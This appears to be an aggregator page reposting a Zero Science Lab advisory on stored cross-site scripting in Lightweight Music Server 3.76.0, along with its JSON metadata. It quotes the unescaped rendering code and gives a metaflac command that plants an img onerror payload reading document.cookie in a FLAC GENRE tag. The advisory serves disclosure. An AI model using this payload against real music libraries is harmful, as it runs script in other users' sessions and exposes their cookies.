Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS_ZSL-2026-5987

Description

Summary LMS Lightweight Music Server: A specific C++ based project focused on a low memory footprint, featuring built-in user management and a recommendation engine. Description LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM...

Visit Original Source

Basic Information

ID ZSL-2026-5987

Published May 31, 2026 at 00:00

Affected Product

Affected Versions <html><body><p>Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS

Vendor: Emeric Poupon
Product web page: https://github.com/epoupon/lms
Affected version 3.76.0

Summary: LMS (Lightweight Music Server): A specific C++ based
project focused on a low memory footprint, featuring built-in
user management and a recommendation engine.

Desc: LMS stores media file metadata tags (such as GENRE, ARTIST,
and ALBUM) exactly as written in the file and later renders them
in its web interface without HTML-encoding, resulting in stored
cross-site scripting. An attacker who gets a file with a malicious
tag into the victim's library has their payload saved during the
next library scan and executed automatically whenever a user views
that track's information or plays the file in the web UI.

--------------------------------------------------------------
/src/lms/ui/Utils.cpp
---------------------
131: std::unique_ptr<wt::winteractwidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)
132: {
133: auto res{ std::make_unique<wt::wtext>(Wt::WString{ canDelete ? "<i class='\"fa' fa-times-circle=""></i> " : "" } + name, Wt::TextFormat::UnsafeXHTML) };
134: res->setStyleClass("Lms-badge-cluster badge me-1 " + std::string{ colorStyleClass });
135: res->setInline(true);
136: return res;
137: }
--------------------------------------------------------------

Tested on: GNU/Linux (ARM64)
nginx

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5987
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987

27.05.2026

--

$ metaflac --set-tag=GENRE="<img onerror="alert(document.cookie)" src="1"/>" evil.flac
$ metaflac --list evil.flac
METADATA block #0
type: 0 (STREAMINFO)
is last: false
length: 34
minimum blocksize: 4608 samples
maximum blocksize: 4608 samples
minimum framesize: 2305 bytes
maximum framesize: 14124 bytes
sample_rate: 44100 Hz
channels: 2
bits-per-sample: 16
total samples: 4664587
MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d
METADATA block #1
type: 4 (VORBIS_COMMENT)
is last: false
length: 98
vendor string: Lavf57.83.100
comments: 2
comment[0]: encoder=Lavf57.83.100
comment[1]: GENRE=<img onerror="alert(document.cookie)" src="1"/>
METADATA block #2
type: 1 (PADDING)
is last: true
length: 8140

</wt::wtext></wt::winteractwidget></p></body></html>

{
    "lastseen": "2026-05-31T18:50:26",
    "description": "Summary LMS Lightweight Music Server: A specific C++ based project focused on a low memory footprint, featuring built-in user management and a recommendation engine. Description LMS stores media file metadata tags such as GENRE, ARTIST, and ALBUM...",
    "published": "2026-05-31T00:00:00",
    "modified": "2026-05-31T00:00:00",
    "type": "zeroscience",
    "title": "Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS",
    "source": "",
    "references": "",
    "id": "ZSL-2026-5987",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "<html><body><p>Lightweight Music Server (LMS) 3.76.0 (metadata) Stored XSS\r\n\r\n\r\nVendor: Emeric Poupon\r\nProduct web page: https://github.com/epoupon/lms\r\nAffected version 3.76.0\r\n\r\nSummary: LMS (Lightweight Music Server): A specific C++ based\r\nproject focused on a low memory footprint, featuring built-in\r\nuser management and a recommendation engine.\r\n\r\nDesc: LMS stores media file metadata tags (such as GENRE, ARTIST,\r\nand ALBUM) exactly as written in the file and later renders them\r\nin its web interface without HTML-encoding, resulting in stored\r\ncross-site scripting. An attacker who gets a file with a malicious\r\ntag into the victim's library has their payload saved during the\r\nnext library scan and executed automatically whenever a user views\r\nthat track's information or plays the file in the web UI.\r\n\r\n--------------------------------------------------------------\r\n/src/lms/ui/Utils.cpp\r\n---------------------\r\n131: std::unique_ptr<wt::winteractwidget> createFilter(const Wt::WString& name, const Wt::WString& tooltip, std::string_view colorStyleClass, bool canDelete)\r\n132: {\r\n133:   auto res{ std::make_unique<wt::wtext>(Wt::WString{ canDelete ? \"<i class='\\\"fa' fa-times-circle=\"\"></i> \" : \"\" } + name, Wt::TextFormat::UnsafeXHTML) };\r\n134:   res->setStyleClass(\"Lms-badge-cluster badge me-1 \" + std::string{ colorStyleClass });\r\n135:   res->setInline(true);\r\n136:   return res;\r\n137: }\r\n--------------------------------------------------------------\r\n\r\nTested on: GNU/Linux (ARM64)\r\n           nginx\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n                            @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2026-5987\r\nAdvisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5987\r\n\r\n\r\n27.05.2026\r\n\r\n--\r\n\r\n\r\n$ metaflac --set-tag=GENRE=\"<img onerror=\"alert(document.cookie)\" src=\"1\"/>\" evil.flac\r\n$ metaflac --list evil.flac\r\nMETADATA block #0\r\n  type: 0 (STREAMINFO)\r\n  is last: false\r\n  length: 34\r\n  minimum blocksize: 4608 samples\r\n  maximum blocksize: 4608 samples\r\n  minimum framesize: 2305 bytes\r\n  maximum framesize: 14124 bytes\r\n  sample_rate: 44100 Hz\r\n  channels: 2\r\n  bits-per-sample: 16\r\n  total samples: 4664587\r\n  MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\r\nMETADATA block #1\r\n  type: 4 (VORBIS_COMMENT)\r\n  is last: false\r\n  length: 98\r\n  vendor string: Lavf57.83.100\r\n  comments: 2\r\n    comment[0]: encoder=Lavf57.83.100\r\n    comment[1]: GENRE=<img onerror=\"alert(document.cookie)\" src=\"1\"/>\r\nMETADATA block #2\r\n  type: 1 (PADDING)\r\n  is last: true\r\n  length: 8140\r\n\r\n</wt::wtext></wt::winteractwidget></p></body></html>",
    "sourceHref": "https://www.zeroscience.mk/codes/lms_xss.txt",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.zeroscience.mk/advisories/ZSL-2026-5987.html",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply